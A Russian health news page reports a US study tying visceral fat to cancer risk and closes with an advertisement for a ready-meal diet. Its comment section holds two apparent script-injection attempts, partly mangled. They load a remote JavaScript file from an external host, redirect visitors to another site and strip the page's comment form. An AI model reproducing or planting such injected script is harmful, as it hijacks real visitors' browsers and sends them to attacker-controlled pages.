Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Жир вызывает рак! Как пох...  >>  Жир вызывает рак! Как похудеть и остаться в живых?!
 
Обратная связь
 

Жир вызывает рак! Как похудеть и остаться в живых?!

Размер шрифта
05 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Не можете найти мотивацию для того, чтобы похудеть? Американские ученые вам помогут: они обнаружили, что жир вокруг ваших внутренних органов значительно повышает риск развития многих типов рака.

Жир вызывает рак! Как похудеть и остаться в живых?!

Исследователи из национального института старения (США) проводят активную научную деятельность с целью более глубокого понимания связи между ожирением и раком. Они разработали методику, с помощью которой можно оценить взаимное влияние этих патологических процессов друг на друга. Особенность этой методики заключается в том, что она опирается не на измерение индекса массы тела (ИМТ) и охват талии, а на методы лучевой диагностики.

 

Авторы испытали разработку на группе пациентов в составе 2 519 человек, которые принимали участие в одном из крупных национальных исследований. Они измеряли массу жировой ткани в брюшной полости и на бедрах (то есть и висцеральный жир, окутывающий внутренние органы, и подкожный жир). Далее пациенты наблюдались в течение 13 лет.

Согласно тексту исследования, «полученные результаты указывают на то, что жировая ткань сама по себе несет в себе большие онкологические риски, чем считалось ранее; кроме того, распределение этого риска неодинаково в зависимости от пола».

«Важно понимать, что индекс массы тела отнюдь не является единственным индикатором здоровья. Так, у мужчин с большим количеством висцерального жира риск развития многих типов рака (пищевода, поджелудочной железы, толстой кишки и так далее) оказался повышен почти в три раза, вне зависимости от ИМТ», – рассказывает доктор Рэчел Мерфи, ведущий автор исследовательской группы, научный сотрудник эпидемиологической лаборатории Национального института старения в городе Бетезда (штат Мэриленд, США).

«Полученные нами данные расширяют имеющиеся представления о связи рака и ожирения у пожилых людей и указывают на однозначную необходимость терапевтического воздействия на висцеральный жир (в сочетании, конечно, со здоровым образом жизни). Это позволит значительно снизить риск развития многих онкологических заболеваний», – уверена доктор Мерфи.

Как похудеть?!

Вы можете похудеть быстро и надолго с «Диетой Елены Малышевой». Уже готовая правильная еда будет доставлена вам в любое удобное место и время. Вам останется только есть и худеть!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Сколько надо сбросить, чтобы не заболеть раком! Ответ в конце статьи!   Старт нового сезона проекта «Сбрось лишнее»   Бойтесь своих друзей, если хотите похудеть   Чтобы худеть, надо есть. Что есть?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 

Слайдшоу

1
Как похудеть, ничего не делая
Как натренировать волю и похудеть?
Еда для плоского живота. Часть 2

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.